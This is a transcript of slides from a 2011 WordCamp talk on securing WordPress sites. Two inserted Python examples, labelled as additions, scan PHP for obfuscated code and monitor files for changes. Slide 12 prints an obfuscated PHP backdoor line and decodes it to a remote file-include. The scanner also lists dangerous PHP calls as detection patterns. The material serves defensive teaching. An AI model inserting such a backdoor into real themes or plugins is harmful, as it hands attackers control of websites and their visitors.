Securing Your WordPress Website - WordCamp GC 2011


Presentation slides from Vladimir Lasky's talk on how to harden your WordPress website against would-be attackers and avoid inadvertently creating security holes.

Contains various tips and recommendations for off-the-shelf plugins to mitigate common security threats.

Presented on Sunday 6th November at WordCamp Gold Coast 2011.

Published in: Technology, Business


  1. Securing Your WordPress Website. Vladimir Lasky, WordCamp GC 2011
  2. For the Impatient, Lazy and Easily Distracted
     - Rename your admin account
     - Only download plugins and themes hosted on and regularly update them
     - Change your database table prefix from "wp_" to something random using the "WordPress Table Rename" plugin
     - Install the plugin "Semisecure Login Reimagined"
  3. Does This Describe You?
     - Seldom update your WordPress installation and plugins
     - Seldom back up your WordPress installation and plugins
     - Access your WordPress site over public computers and/or Wi-Fi networks
     - Use the same password on multiple websites
     - Download themes and plugins from third-party sites or file-sharing networks
     - Rely on cheap developers found through online freelance websites
     - You may be at risk!
  4. How We Achieve Security
     - The only perfect security is to not have a website; anything else is relative
     - Our goals:
       - Make the attacker pick on a weaker target
       - Avoid creating a security hole ourselves
     - Our plan:
       - Use off-the-shelf WordPress plugins where possible, and avoid doing anything that breaks compatibility with other plugins or complicates day-to-day activities
  5. The Three Pillars of Security
     - Prevention
     - Detection
     - Recovery
  6. Know Your Enemy
     - Cyber criminals
     - Cheap thrill seekers, AKA "script kiddies"
     - Business rivals
     - Disgruntled employees
     - Ideological enemies
  7. What Do Attackers Want to Achieve?
     - Cheap thrills
     - Material for identity theft
     - Damage the reputation of a business
     - Disrupt e-commerce
     - Create a "botnet": a staging point for attacks against a third party
     - Obtain restricted information
     - Black-hat SEO (usually backlink generation)
  8. Characterising Security Threats
     - Active/passive method
     - The aims of the other party
     - Their knowledge of you
     - Their level of motivation
     - The level of difficulty required
     - What their alternative option is
  9. Top Security Threats
     - Brute-force password attacks
     - Code injection attacks (SQL/PHP and XSS)
     - Denial of service attacks
     - Sniffing network traffic to recover plaintext passwords and session cookies
     - Malicious code within themes/plugins
  10. Brute Force Password Attack Example
  11. Classic SQL Injection Example
  12. Malicious Code Example
     - The following is a line of obfuscated PHP code in a compromised plugin or theme:

           eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs="));

     - This evaluates as the following PHP statement:

           if(isset($_GET["cmd"]))include $_GET["cmd"];

     - This allows an attacker to run any PHP script on your site by setting the query parameter 'cmd' in the URL:
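A defender's check for the construct on this slide, added here as an example that is not part of the talk: a small Python scanner that locates `eval(base64_decode("..."))` in PHP source, decodes the payload and flags indicators such as `include` and `$_GET` so a reviewer sees the real statement instead of the blob. The theme file is constructed; the base64 string inside it is the one from the slide.

```python
import base64
import re

# Matches the eval(base64_decode("...")) construct shown on the slide.
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)',
    re.IGNORECASE,
)

# Tokens whose presence in a decoded payload warrants a human look.
SUSPICIOUS_CALLS = ("include", "require", "system", "exec", "shell_exec",
                    "passthru", "eval", "$_GET", "$_POST", "$_REQUEST")


def decode_payload(b64: str) -> str:
    """Decode a base64 payload, tolerating stripped '=' padding."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")


def scan_php_source(source: str):
    """Return findings as (line_no, decoded_payload, matched_indicators)."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for match in EVAL_B64_RE.finditer(line):
            decoded = decode_payload(match.group(1))
            hits = [token for token in SUSPICIOUS_CALLS if token in decoded]
            findings.append((line_no, decoded, hits))
    return findings


# Constructed sample: a benign theme file with the slide's obfuscated line appended.
SAMPLE_THEME_FILE = """<?php
// functions.php (constructed sample, not a real theme)
add_action('wp_head', 'my_theme_head');
function my_theme_head() { echo '<meta name="generator" content="demo">'; }
eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs="));
"""

if __name__ == "__main__":
    for line_no, decoded, hits in scan_php_source(SAMPLE_THEME_FILE):
        print(f"line {line_no}: decodes to {decoded!r}; indicators: {hits}")
```

Run it over every `.php` file under `wp-content/` to get the same kind of sweep the Theme Authenticity Checker plugin performs, but with the decoded statement in the report.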
  13. Good Habits
     - Only obtain free plugins and themes hosted on
     - Buy premium plugins/themes from the author's website, which should have their contact details
     - Update your WordPress installation and plugins regularly
     - When travelling, access the Internet from your own smartphone or notebook computer, not from an Internet cafe
  14. Choosing a Password
     - Twelve characters long as a minimum, but not a dictionary word
     - Common number/letter substitutions are not very useful
     - A good mnemonic technique: come up with a memorable sentence and use the first letter of each word to form the password, e.g.
       - "Jack and Jill went up the hill to fetch a pail of water" could form the 13-character password "JaJwuthtfapow"
  15. Secure Your Backups
     - Most automated backup plugins operate this way:
       - They archive your database and installation files
       - They upload this archive to a remote site using saved authentication details
     - If your site is compromised, these saved authentication details could be used to destroy your saved backups
     - The solution: automated remote backups
  16. Automated Remote Backups
     - Instead:
       - Use the backup plugin ONLY to archive your database and installation files and place them in a private folder
       - Configure a remote system to periodically connect to your site via SFTP/FTP and download this backup file
     - If a hacker compromises your system, they will not be able to destroy your saved backups
     - Good article on implementing this:
  17. Plugin: Semisecure Login Reimagined
     - Purpose:
       - Encrypts passwords without requiring SSL. Instead, it uses JavaScript to encrypt the password
     - Benefits:
       - Simple installation: just activate
       - Eliminates the risk of obtaining the password by sniffing network traffic
     - Limitations:
       - All other traffic is unencrypted; the WordPress session cookie is still vulnerable
  18. Plugin: WordPress HTTPS (SSL)
     - Purpose:
       - All traffic between web browser and blog is encrypted
     - Benefits:
       - Eliminates the risk of password sniffing and session hijacking
     - Limitations:
       - Requires a web host with a shared SSL certificate (HostGator, BlueHost)
       - Alternatively, you must obtain an SSL certificate in the name of your primary domain and get your web host to install it
       - Higher CPU usage on the web server
  19. Plugin: Theme Authenticity Checker
     - Purpose:
       - Scans your theme files for the presence of code that is likely to be malicious
     - Benefit:
       - Rapidly scans theme files without having to look through code manually
     - Limitations:
       - Does not scan plugins
       - Not guaranteed to find all types of malicious code
  20. Plugin: WordPress File Monitor Plus
     - Purpose:
       - Periodically checks whether any files have been added, changed or deleted in your WordPress installation
     - Benefit:
       - Will detect many types of PHP injection attacks and other forms of intrusion
     - Limitations:
       - Will generate false alarms. You may specify folders to be excluded, but then there is a risk that those could be compromised without you knowing
       - Small chance that a very well-targeted attack could deactivate or sabotage the plugin before it raises the alarm
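To show what a file monitor of this kind does under the hood, including the exclusion caveat on this slide, here is an added Python example that is not the plugin's own code: it baselines SHA-256 hashes of a constructed fake install in a temporary directory, simulates an added, a changed and a deleted file, and reports the difference. The folder `wp-content/uploads` is excluded, so a file dropped there is deliberately missed.

```python
import hashlib
import os
import tempfile

def snapshot(root, exclude_dirs=()):
    """Map each file under root ('/'-separated relative path) to its SHA-256; skip exclude_dirs."""
    state = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir + "/"
        # Prune excluded directories in place so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames if rel_dir + d not in exclude_dirs]
        for name in filenames:
            with open(os.path.join(dirpath, name), "rb") as fh:
                state[rel_dir + name] = hashlib.sha256(fh.read()).hexdigest()
    return state

def diff_snapshots(old, new):
    """Report files added, changed or deleted between two snapshots."""
    return {
        "added": sorted(set(new) - set(old)),
        "deleted": sorted(set(old) - set(new)),
        "changed": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }

def _write(root, rel_path, data):
    path = os.path.join(root, *rel_path.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)

def demo():
    """Constructed scenario: baseline a fake install, then simulate an intrusion."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "wp-config.php", b"<?php define('DB_NAME', 'demo');")
        _write(root, "wp-content/themes/demo/functions.php", b"<?php // clean theme")
        _write(root, "wp-content/uploads/photo.jpg", b"\xff\xd8\xff")
        exclude = ("wp-content/uploads",)
        baseline = snapshot(root, exclude)
        # Intrusion: theme file altered, extra PHP file dropped, config deleted.
        _write(root, "wp-content/themes/demo/functions.php", b"<?php // altered")
        _write(root, "wp-content/themes/demo/shell.php", b"<?php // injected")
        os.remove(os.path.join(root, "wp-config.php"))
        # A file dropped in the excluded folder is NOT reported: the slide's caveat.
        _write(root, "wp-content/uploads/dropped.php", b"<?php // unseen")
        return diff_snapshots(baseline, snapshot(root, exclude))

if __name__ == "__main__":
    print(demo())
```

In production the baseline must be stored off the web root (and ideally off the server), otherwise an attacker who can write files can also rewrite the baseline.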
  21. Plugin: WordPress Firewall 2
     - Purpose:
       - Monitors web requests and blocks those that seem suspicious
     - Benefit:
       - Will block the majority of SQL and PHP injection attempts
     - Limitations:
       - Small performance overhead on each request
       - On the most aggressive setting, could interfere with some plugins
  22. Plugin: Useful 404s
     - Purpose:
       - Detects broken links on your website, or broken links on external sites, and sends you an email
     - Benefit:
       - As a side effect, it can also detect attempts to compromise your site, namely where the attacker spoofs the HTTP_REFERER header and attempts to blindly access plugin or theme files that may not exist
     - Limitations:
       - Lots and lots of false alarms
  23. Plugin: Email PHP Errors Plugin
     - Purpose:
       - Captures PHP error output and can also generate emails with error reports. Helps detect bugs in plugins or themes, or problems with the web host
     - Benefit:
       - As a side effect, may detect some types of PHP injection attempts or other attempts to exploit code vulnerabilities
       - People often overlook their error logs and let them pile up
     - Limitations:
       - Lots of false alarms
  24. Plugin: WP-Ban
     - Purpose:
       - Ban users by IP, IP range, host name, user agent and referrer URL from visiting your site
     - Benefit:
       - Useful for blocking repeat attacks by the same party
       - Able to reduce the impact of denial of service (DoS) attacks
     - Limitations:
       - Need to determine the details of the specific attacker(s)
       - A wise attacker will change their IP addresses frequently
       - Can block innocent people
  25. Conclusion
     - WordPress Codex: Hardening WordPress
       - Various tips for site administrators to improve your site security
     - WordPress Codex: Data Validation
       - A must for developers; describes all the facilities available in WordPress to validate data, preventing your code from being vulnerable to code injection exploits
     - Questions and Comments: